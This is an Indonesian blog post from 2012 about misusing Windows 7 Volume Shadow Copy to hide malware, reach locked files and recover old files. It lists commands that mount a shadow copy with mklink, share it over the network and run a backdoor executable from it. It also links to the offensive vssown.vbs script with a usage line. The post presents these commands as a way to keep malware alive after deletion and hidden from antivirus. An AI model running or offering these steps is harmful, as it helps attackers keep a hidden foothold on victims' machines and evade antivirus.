Minggu, Oktober 21, 2012

Injeksi Malware, Akses File Terkunci, dan Membuka File Lama di Windows 7 dengan Volume Shadow Copy

Penulis Day Milovich | Minggu, Oktober 21, 2012 | 03.07.00 |

Bagaimana rasanya jika system Windows 7 terinfeksi malware yang selalu muncul kembali walaupun malware itu sudah dihapus? Itu bisa terjadi jika malware tersimpan di volume shadow copy.
Volume Shadow Copy mirip hantu dalam mesin.
Volume Shadow Copy di Windows 7 bisa digunakan untuk: sembunyikan malware (malware bisa diaktifkan walaupun file sudah dihapus, dan tidak terdeteksi antivirus), mengakses file terkunci, dan menemukan file lama.
---
Pemakaian VSS untuk injeksi malware:
http://lanmaster53.com/talks/#hack3rcon2
Command line (eg) :
---
vssadmin list shadows
---
mklink /D c:\temp\drv \\.\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\
net share drv=c:\temp\drv
net use f: \\127.0.0.1\drv
f:\malware\backdoor.exe
---
Download script vssOwn.vbs :
http://ptscripts.googlecode.com/svn-history/r1/trunk/windows/vssown.vbs
---
Pemakaian VSSOwn :
cscript vssown.vbs /create
---
Silakan share ke kawan yang suka keamanan internet atau akun facebook-nya pernah terinfeksi malware, agar jadi bahan diskusi.
Bagaimana caramu menangani volume shadow copy di Windows 7?

Day Milovich,,
Webmaster, artworker, your friend.
:)

Tidak ada komentar:

Posting Komentar

Anda bisa berkomentar tanpa perlu login.

 
Day Milovich (c) 2013. Diberdayakan oleh Blogger.